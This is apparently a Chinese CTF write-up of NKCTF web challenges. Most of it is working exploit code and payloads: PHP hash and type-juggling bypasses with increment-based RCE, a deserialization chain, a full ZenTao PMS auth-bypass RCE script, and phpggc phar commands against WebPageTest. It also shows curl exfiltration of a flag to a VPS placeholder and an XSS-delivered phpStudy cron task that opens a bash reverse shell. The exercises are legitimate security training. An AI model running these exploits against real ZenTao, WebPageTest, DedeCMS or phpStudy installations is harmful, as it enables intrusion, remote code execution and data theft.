Web
大多数是可以在网上找到poc和文章,跟着打就行的,没有喜欢的那种代码审计题(XD)
eazy_php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| <?php highlight_file(__FILE__); error_reporting(0); if($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])){ if((string)$_POST['c'] != (string)$_POST['d'] && sha1($_POST['c']) === sha1($_POST['d'])){ if($_GET['e'] != 114514 && intval($_GET['e']) == 114514){ if(isset($_GET['NS_CTF.go'])){ if(isset($_POST['cmd'])){ if(!preg_match('/[0-9a-zA-Z]/i', $_POST['cmd'])){ eval($_POST['cmd']); }else{ die('error!!!!!!'); } }else{ die('error!!!!!'); } }else{ die('error!!!!'); } }else{ die('error!!!'); } }else{ die('error!!'); } }else{ die('error!'); } ?> error!
|
简单分析一下
- md5数组绕过
- sha1碰撞
- php弱类型,114514.9!=114514,intval(‘114514.9’)==114514
- php参数规范化,如果参数名里面带有
[
,.
等字符,会自动转换为_
,但是只会转换一次,所以使用NS[CTF.go
就会转换为NS_CTF.go
- 自增rce
数据包如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| POST /?a[]=1&b[]=2&e=114514.9&NS[CTF.go=1 HTTP/1.1 Host: a966893b-3e1a-4e54-b576-29f8a7f571cc.node2.yuzhian.com.cn Content-Length: 2568 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Origin: http://a966893b-3e1a-4e54-b576-29f8a7f571cc.node2.yuzhian.com.cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://nkctf.yuzhian.com.cn:8000/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.1935970464.1678703074; _ga_KCSGQQ51ER=GS1.1.1679725242.12.1.1679727705.0.0.0 Connection: close
c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&cmd=$_=[].[];$_=$_['!'=='$'];$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$___=$__;$_____=$__;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$___.=$_____;$___.=$__;$__%2B%2B;$___.=$__;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$___.=$_;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$___.=$_;$____='_';$_=[].[];$_=$_['!'=='$'];$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$_=$$____;$___($_[_]);&_=cat /f*
|
baby_php
源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
| <?php error_reporting(0); class Welcome{ public $name; public $arg = 'oww!man!!'; public function __construct(){ $this->name = 'ItS SO CREAZY'; } public function __destruct(){ if($this->name == 'welcome_to_NKCTF'){ echo $this->arg; } } }
function waf($string){ if(preg_match('/f|l|a|g|\*|\?/i', $string)){ die("you are bad"); } } class Happy{ public $shell; public $cmd; public function __invoke(){ $shell = $this->shell; $cmd = $this->cmd; waf($cmd); eval($shell($cmd)); } } class Hell0{ public $func; public function __toString(){ $function = $this->func; $function(); } }
if(isset($_GET['p'])){ unserialize($_GET['p']); }else{ highlight_file(__FILE__); } ?>
|
一个简单的反序列化,但是命令执行的时候需要绕一下
使用eval(urldecode(xxx))
的方式来绕过检测,需要进行二次url编码
system('cat /f1ag');
=>%73%79%73%74%65%6D%28%27%63%61%74%20/%66%31%61%67%27%29%3B
/
的url编码为%2F
,会被过滤,所以需要注意一下,不要编码/
poc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| <?php class Welcome { public $name; public $arg = 'oww!man!!'; } class Happy{ public $shell; public $cmd; } class Hell0{ public $func; } $a=new Welcome(); $b=new Hell0(); $c=new Happy(); $a->name=$b; $b->func=$c; $c->shell="urldecode"; $c->cmd="%73%79%73%74%65%6D%28%27%63%61%74%20/%66%31%61%67%27%29%3B"; echo urlencode(serialize($a));
|
easy_pms
就是禅道的一个rce漏洞,网上有poc,直接用就行zentaopms_poc
只不过注意一下,他命令执行只有返回一行,所以需要将他base64编码一一下
payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55
|
''' 权限绕过+RCE POC 伪静态传参版 禅道系统 影响版本 安全版本 开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2 旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2 企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2 ''' import requests
proxies = { } def check(url): url1 = url+'/misc-captcha-user.html' url3 = url + 'repo-create.html' url4 = url + 'repo-edit-10000-10000.html' headers={ "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "Accept-Language":"zh-CN,zh;q=0.9", "Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default", }
headers2 = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default", "Content-Type":"application/x-www-form-urlencoded", "X-Requested-With":"XMLHttpRequest", "Referer":url+"/repo-edit-1-0.html" }
data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=' data2 = 'SCM=Subversion&client=`tac /f*|base64`' s=requests.session() try: req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers) req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2) req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2) print(req4.text) if 'uid=' in req4.text: print(url,"") print(req4.text) return True except Exception as e: print(e) return False if __name__ == '__main__': print(check("http://1e43db25-38e4-4fd7-b7d3-bd7ba773eb58.node2.yuzhian.com.cn/"))
|
hard_php
源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| <?php
error_reporting(0); highlight_file(__FILE__);
if (isset($_POST['NKCTF'])) { $NK = $_POST['NKCTF']; if (is_string($NK)) { if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$NK) && strlen($NK) < 105){ eval($NK); }else{ echo("hacker!!!"); } }else{ phpinfo(); } } ?>
|
跟ctfshow之前举办的一个极限rce挑战很像
直接上payload,要用burp发包
1
| %91=phpinfo&%92=1&NKCTF=$_=(%99/%99.%99)[_];$%81=%2b%2b$_;$%81=_.%2b%2b$_.$%81[$_%2b%2b/$_%2b%2b].%2b%2b$_.%2b%2b$_;$$%81[%91]($$%81[%92]);
|
但是查看phpinfo可以发现他过滤了几个函数passthru,exec,system
没有过滤shell_exec
因为这个不会回显,所以通过wget或者curl的方法来外带数据到vps上
1 2
| curl http://vps:ip/`ls` curl http://vps:ip/`cat /f*|base64`
|
1
| %91=shell_exec&%92=curl http://vps:ip/`cat /f*|base64`&NKCTF=$_=(%99/%99.%99)[_];$%81=%2b%2b$_;$%81=_.%2b%2b$_.$%81[$_%2b%2b/$_%2b%2b].%2b%2b$_.%2b%2b$_;$$%81[%91]($$%81[%92]);
|
在burp里面要将空格进行url编码
vps开启监听,然后发包,在vps里可以获得flag
webpagetest
他的反序列化漏洞,参考webpagetest反序列化及ssrf漏洞分析
下载phpggc后,直接跟着文章的内容打就行
1 2 3 4 5 6 7
| ./phpggc Monolog/RCE2 system 'cat /f*' -p phar -o testinfo.ini
URLENC_PAYLOAD=$(cat testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g")
curl -sSkig 'http://737a43c3-7c8c-4a50-a4ea-230507a1d702.node2.yuzhian.com.cn/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o -
curl -sSkig 'http://737a43c3-7c8c-4a50-a4ea-230507a1d702.node2.yuzhian.com.cn/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -
|
easy_cms
dedecms
找到后台路径/dede
dedecms的默认密码为admin/admin
,直接登录
直接上传文件写马会被检测,又网上找了好多种后台getshell方法,但是都不如意
最后还是使用写马的方式,利用字符串拼接来绕过检测
在这里可以大概知道他会检测什么
然后在文件式管理器上传文件
发现他会过滤file_put_contents等一些函数,我记得在做的时候是使用字符串拼接来执行和file_put_contents来写文件执行命令的,但是在写wp的时候不知道为什么就不行了XD
因为是ctf,所以只要得到flag就行
新建以下文件
查看flag名
1 2
| <?php var_dump(scandir("/"));
|
读取flag
1 2
| <?php echo file_get_contents("/f1Aggg");
|
xiaopi
小皮面板rce,参考【漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
打开靶机会显示404
本地安装一下小皮面板,对登录进行抓包,发现有个X-Requested-With: XMLHttpRequest
这种头部带上X-Requested-With:XMLHttpRequest的是 Ajax 异步请求。
所以加上这个http头,可以发现正常回显
然后就是要上面文章里的poc
直接使用bash来弹shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| function poc(){ $.get('/service/app/tasks.php?type=task_list',{},function(data){ var id=data.data[0].ID; $.post('/service/app/tasks.php?type=exec_task',{ tid:id },function(res2){ $.post('/service/app/log.php?type=clearlog',{ },function(res3){},"json"); },"json"); },"json"); } function save(){ var data=new Object(); data.task_id=""; data.title="test"; data.exec_cycle="1"; data.week="1"; data.day="3"; data.hour="14"; data.minute = "20"; data.shell='bash -c"bash -i >& /dev/tcp/ip/port 0>&1"'; $.post('/service/app/tasks.php?type=save_shell',data,function(res){ poc(); },'json'); } save();
|
然后把文件放在vps里,用python开启一个简易服务,python3 -m -http.server
然后在登录框内,用户名填写为<script src="http://vpsip:port/shell.js"></script>
,密码随便填,然后vps开启监听,等bot登录,就会执行shell.js来创建一个计划任务,从而反弹shell